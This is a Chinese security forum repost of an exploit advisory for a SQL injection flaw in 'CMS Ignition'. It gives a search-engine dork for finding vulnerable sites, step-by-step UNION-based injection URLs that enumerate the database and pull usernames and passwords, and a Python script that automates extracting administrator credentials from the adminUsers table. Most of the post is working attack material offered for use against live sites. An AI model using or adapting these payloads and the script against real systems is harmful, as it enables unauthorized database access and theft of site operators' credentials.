看雪论坛
发新帖

[转帖]CMS Ignition SQL Injection Exploit

freebsdlin 2010-7-26 13:24 2770
[+] SQL Injection Vulnerability  

[+] Dorks: allinurl:"shop.htm?shopMGID="  

[+] Bug in shop.htm?shopMGID  

[+] Exploit: http://www.site.com/shop.htm?shopMGID=XXXX (see below python exploit)  

[+]   

==================================================  

   

Step[1]:  

Error  

http://www.site.com/shop.htm?shopMGID=9999'  

   

Step[2]:  

Number of columns  

http://www.site.com/shop.htm?shopMGID=9999+order+by+1--  

   

Step[3]:  

Output of numbers  

http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,3,4,5--  

   

Step[4]:  

Collect informations  

http://www.site.com/shop.htm?shopMGID=-9999+union+select+version(),database(),3,4,5+from+information_schema.columns--  

   

Step[5]:  

If version is  

5.0.67-community  

5.0.32-Debian_7etch8-log  

5.0.40-log  

http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5+from+information_schema.columns--  

   

Step[6]:  

Increment zero in "limit+0,1--" until you have interesting tables and columns  

http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5+from+information_schema.columns+limit+0,1--  

   

Step[7]:  

Get the content  

(fiction tables in this example)  

http://www.site.com/shop.htm?shopMGID=-9999+union+select+1,2,concat_ws(0x3a,username,password),4,5+user--  

   

==================================================  

   

[+] Contact:  

    - neavorc[at]gmail.com  

   

==================================================  

Discovered by NEAVORC  

Cheers'n'Oi  

   

==================================================  

   

# Exploit Title:    CMS Ignition SQL Injection  

# Date:         25/08/2010  [DD:MM:JJJJ]  

# Author:       NEAVORC  

# Software Link:    http://www.finegrafix.co.za/  

#           http://www.finegrafix.co.za/cmsignition.htm  

# Dork:         Dorks: allinurl:"shop.htm?shopMGID="      

   

import urllib ,sys,os   

if len(sys.argv)!=2:  

    os.system('cls')  

    os.system('clear')  

    print "==============================================================================="  

    print "==============   CMSignition Exploit  ||| NEAVORC[@]gmail[.]com ==============="  

    print "==============================================================================="  

    print "== Take the Admin username and the password from the tagrt page              =="  

    print "=Usage: ./exploit.py <injection>                                             =="  

    print "=Exmpl: ./exploit.py <http://www.site.com/shop.htm?shopMGID=131>  =="  

    print "==============================================================================="  

    sys.exit(1)  

global url,end,injection,i    

url = sys.argv[1]  

url = url.replace("=","=-")  

end = "+from+adminUsers--"  

injection = "+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a,0x6F7574707574,username,password,0x6861636B6564),22,23,24,25,26,27,28,29,"  

os.system('cls')  

print "==============================================================================="  

print "=================   SQLi   Exploit  ||| NEAVORC[@]gmail[.]com ================="  

print "==============================================================================="  

print "==                         Exploiting Please wait...                         =="  

print "==============================================================================="  

   

if url[:7] != "http://":  

    print "Url correction...."  

    url = "http://"+url  

    print "To : "+url  

try:  

    i = 30  

    while i <=70:  

        global full_inj  

        injection = injection+str(i)+","  

        full_inj = url+injection[:-1]+end  

        f = urllib.urlopen(full_inj)  

        s = f.read()  

        if "output:" in s:  

            begin = int(s.find("output"))  

            end = int(s.find("hacked"))  

            columns = full_inj[-20:-18]  

            os.system('cls')  

            
            print "=================   Administrator: "+s[begin:end-1]  

            print "=================   Columns: "+columns  

            
        i = i+1   

except(TypeError):  

    exit 
本主题帖已收到 0 次赞赏,累计¥0.00
最新回复 (1)
nw无解 2017-8-22 21:43
2
返回



©2000-2017 看雪学院 | Based on Xiuno BBS | 域名 加速乐 保护 | SSL证书 又拍云 提供 | 微信公众号:ikanxue
Time: 0.011, SQL: 9 / 京ICP备10040895号-17